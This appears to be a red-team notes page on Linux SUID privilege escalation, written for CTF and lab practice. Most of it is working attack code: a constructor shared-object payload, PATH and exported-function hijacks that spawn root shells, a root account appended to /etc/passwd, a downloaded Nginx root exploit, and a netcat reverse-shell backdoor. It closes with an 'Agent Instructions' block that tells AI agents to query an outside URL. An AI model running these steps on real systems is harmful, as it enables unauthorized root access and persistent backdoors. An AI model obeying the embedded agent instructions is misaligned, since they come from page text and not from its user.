# SUID
## Enumeration
Search for SUID files:
```bash
find / -perm -u=s -type f 2>/dev/null
```
## Method 1: GTFOBins
Search for SUID payloads:
{% embed url="" %}
GTFOBins
{% endembed %}
For example, if `/bin/systemctl` is a SUID binary, use the following method to achieve **arbitrary file read**:
```bash
$ TF=$(mktemp).service
$ echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
[Install]
WantedBy=multi-user.target' > $TF
$ /bin/systemctl link $TF
$ /bin/systemctl enable --now $TF
```
## Method 2: Shared Object Injection
Suppose `/usr/local/bin/suid-so` is a SUID binary that calls an non-existent shared object. Use `strace` to examine the **system calls** that this binary executes:
```bash
strace /usr/local/bin/suid-so 2>&1 | grep -i -E "open|access|no such file"
```
From the output, notice that a `.so` file is not present in the target system and this path is from a **writable directory**:
The idea is to generate a privesc payload with the path `/home/user/.config/libcalc.so`. Save the following C code as `libcalc.c`:
{% code title="libcalc.c" %}
```c
#include
#include
static void inject() __attribute__((constructor));
void inject() {
system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");
}
```
{% endcode %}
Compile this source code to a shared object:
```bash
gcc -shared -o /home/user/.config/libcalc.so -fPIC /home/user/.config/libcalc.c
```
Execute the SUID binary in order to trigger the exploit:
```bash
/usr/local/bin/suid-so
```
And we will get a root shell.
## Method 3: Binary Symlinks
{% embed url="" %}
Nginx privesc
{% endembed %}
Binary Symlinks is a **Nginx vulnerability** that abuses **Nginx log permissions**. If the attack succeeds, it will escalate the user privilege from `www-data` to `root`. The downside is that we have to **wait until 6:25am** in real life for this exploit to be triggered.
Enumerate Nginx version:
```bash
dpkg -l | grep nginx
```
If this version of Nginx is vulnerable, download the exploit script:
```bash
wget https://raw.githubusercontent.com/ret2basic/Pentest-Exploit-Lookup/main/Nginx/nginxed-root.sh
```
Run the exploit:
```bash
./nginxed-root.sh /var/log/nginx/error.log
```
This exploit will be triggered at 6:25am by default.
## Method 4: Environmental Variables
### Case 1: SUID binary calls relative path instead of absolute path
Suppose `/usr/local/bin/suid-env` is a SUID binary that executes `service apache2 start`. Strings it:
Note that `service apache2 start` is called using **relative path**. The idea is to forge a malicious `service` binary in a writable directory and add that directory to the beginning of the `$PATH` variable. When this SUID binary executes `service apache2 start`, it will execute the malicious `service` binary instead of the legit `/usr/sbin/service`.
In `/tmp`, create a malicious C source file:
```bash
echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/service.c
```
Compile it:
```bash
gcc /tmp/service.c -o /tmp/service
```
Add `/tmp` to the beginning of the `$PATH` variable:
```bash
export PATH=/tmp:$PATH
```
Execute the SUID binary:
```bash
/usr/local/bin/suid-env
```
Now we get a root shell.
The mitigation is use absolute path in the binary, for example, `/usr/sbin/service apache2 start`.
### Case 2: SUID binary calls absolute path but still not good enough
Suppose `/usr/local/bin/suid-env2` is a SUID binary that executes `/usr/sbin/service apache2 start`. Strings it:
Although this SUID binary calls the absolute path correctly, we are still able to spawn a root shell from it.
Define a shell function containing privesc payload:
```bash
function /usr/sbin/service() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }
```
Export `/usr/sbin/service` as environmental variable. Here `-f` means "refer to shell functions":
```bash
export -f /usr/sbin/service
```
Execute the SUID binary:
```bash
/usr/local/bin/suid-env2
```
Now we get a root shell.
## Method 5: Text Editors (Nano, Vim, etc)
Suppose `/bin/nano` is SUID, then we can add a root user to the victim system. The idea is to add a new user with appropriate permissions and valid password hash to the `/etc/password` file.
Generate a valid hash of the password "pom":
```bash
perl -e 'print crypt("pom", "pom"), "\n"'
```
The generated password hash is `poD7u2nSiBSLk`. Open /etc/passwd using Nano:
```bash
nano /etc/passwd
```
Append the following entry to `/etc/passwd`:
```
pom:poD7u2nSiBSLk:0:0:root:/root:/bin/bash
```
Now we can switch to the `pom` user who has root permissions:
```bash
su pom
# password = pom
```
## Method 6: Netcat Backdoor
One way to implant a backdoor to the victim machine is making `/bin/nc` SUID. Then we can catch a root reverse shell by executing the following command on the victim machine:
```bash
nc -e /bin/bash 443
```
## Challenge: TryHackMe - Vulnversity
{% embed url="" %}
TryHackMe - Vulnversity
{% endembed %}
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://ret2basic.gitbook.io/ctfnote/red-teaming/privilege-escalation/linux-privilege-escalation/suid.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.